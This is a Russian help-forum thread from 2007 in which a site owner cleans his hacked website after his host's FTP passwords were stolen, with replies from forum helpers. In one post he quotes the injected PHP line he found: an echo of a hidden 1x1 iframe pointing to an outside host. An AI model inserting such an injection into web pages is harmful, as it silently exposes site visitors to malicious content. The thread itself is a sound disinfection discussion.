Показано с 1 по 9 из 9.

Мой сайт заражён. Борьбу проигрываю. Прошу помощи (заявка № 10020)

  1. #1
    Junior Member Репутация
    Регистрация
    25.05.2007
    Сообщений
    4
    Вес репутации
    39

    Мой сайт заражён. Борьбу проигрываю. Прошу помощи

    Проверил сегодня сайт, за которым меня попросил присмотреть приятель: _http://www.sochi-medved.ru/

    Во время загрузки обращается к пяти сторонним узлам. Из каталога вычистил несколько файлов, которые появились несанкционированно - "arm.php", "1.php" и "ps.php". Закрыл все доступы. Снял права на запись со всех папок. В папке "cgi-bin" был скрипт "cgitelnet.pl" - удалил. Поменял пароли на панель управления и фтп-доступ. Но при загрузке по прежнему обращается к каким-то хакерским узлам. ФФ просто вылетает. Опера предлагает поставить "чистильщик реестра".

    Хостер, незадолго до этого, сообщал о массовом воровстве паролей ФТП у него и просил всё поменять. Я это сделал. Но, видимо, опоздал. Мои компы чистые. ОСтальные сайты - полтора десятка - тоже чистые. Залезли через хостера - 100%.

    Саппорт, в ответ на просьбу о помощи, написал: "Со своей стороны, можем удалить вставленные вирусом строчки из файлов (нужно указать пример строки которую нужно удалить из файлов)".

    Что делать, подскажите? Где чистить? Спасибо.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    21.04.2005
    Адрес
    Perm, Russia
    Сообщений
    5,794
    Вес репутации
    2269
    Чистить - ваш компьютер.
    Прочитайте здесь, а потом выполните правила.

  4. #3
    Junior Member Репутация
    Регистрация
    25.05.2007
    Сообщений
    4
    Вес репутации
    39
    Да, вот ещё что. Стартовую страницу "index.php" тоже почистил. В конце была строка:
    Код:
    echo "<iframe src='http://www.rad*ay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";
    Не помогает. Снова появляется. БД нужно чистить?
    Последний раз редактировалось Alex_Goodwin; 29.05.2007 в 04:54.

  5. #4
    Junior Member Репутация
    Регистрация
    25.05.2007
    Сообщений
    4
    Вес репутации
    39
    anton_dr
    Всё это прочёл ещё до регистрации. Компьютер чистый. IE вообще не пользуюсь. Хищение паролей, причём массовое, произошло у хостера. Он об этом сам сообщал. Речь не о том. Где и что они ещё успели прописать? Сторонних файлов не осталось.
    Конечно, можно снести движок, но у меня чисто спортивный интрес уже возник. Надо бы победить эту заразу. Если допустить, что БД испорчена - что искать в ней? Какие текстовые поля могут относиться к вирусу?

  6. #5
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    25.02.2007
    Сообщений
    8,033
    Вес репутации
    1695
    Может лучше остаться в какой-то одной теме, чем сразу в двух? Консультанты одни и те же...
    P.S.: shinkareff создал такую же тему на форуме ЛК. Вот ссылка http://forum.kaspersky.com/index.php?showtopic=39219

  7. #6
    Junior Member Репутация
    Регистрация
    25.05.2007
    Сообщений
    4
    Вес репутации
    39
    Всё, победил. Главная подгружается ещё из папки "систем". Там два файла пришлось полечить - "login.php" и "index.php". Строчку в обоих убрал в конце. Спасибо.

    MaXim, извините, не думал, что это зеркала. Паника, знаете ли, влияет на здравый смысл иногда.

  8. #7
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    25.02.2007
    Сообщений
    8,033
    Вес репутации
    1695
    Страшного ни чего нет, просто путаница возникает.

  9. #8
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    07.07.2005
    Адрес
    Moscow region
    Сообщений
    30,462
    Вес репутации
    2499
    Цитата Сообщение от shinkareff Посмотреть сообщение
    MaXim, извините, не думал, что это зеркала. Паника, знаете ли, влияет на здравый смысл иногда.
    Это не зеркала . Помогаем и там, и здесь.
    Павел
    AVZ HijackThis помощь с 10-00 до 18-00МСК

    Windows7, SEP(work)
    WindowsXP KIS(home)

    На up не реагирую

  10. #9
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    28.03.2006
    Сообщений
    2,780
    Вес репутации
    1362
    И не все одни и те же..

  • Уважаемый(ая) shinkareff, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Прошу помощи
      От AnnListk в разделе Помогите!
      Ответов: 10
      Последнее сообщение: 15.12.2011, 12:32
    2. Прошу помощи!
      От dumspiro в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 14.12.2011, 13:03
    3. Прошу помощи!
      От tralex2009 в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 07.12.2011, 21:48
    4. Ответов: 4
      Последнее сообщение: 21.09.2011, 23:22
    5. Прошу помощи!
      От Васёк в разделе Помогите!
      Ответов: 11
      Последнее сообщение: 22.02.2009, 02:22

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00811 seconds with 16 queries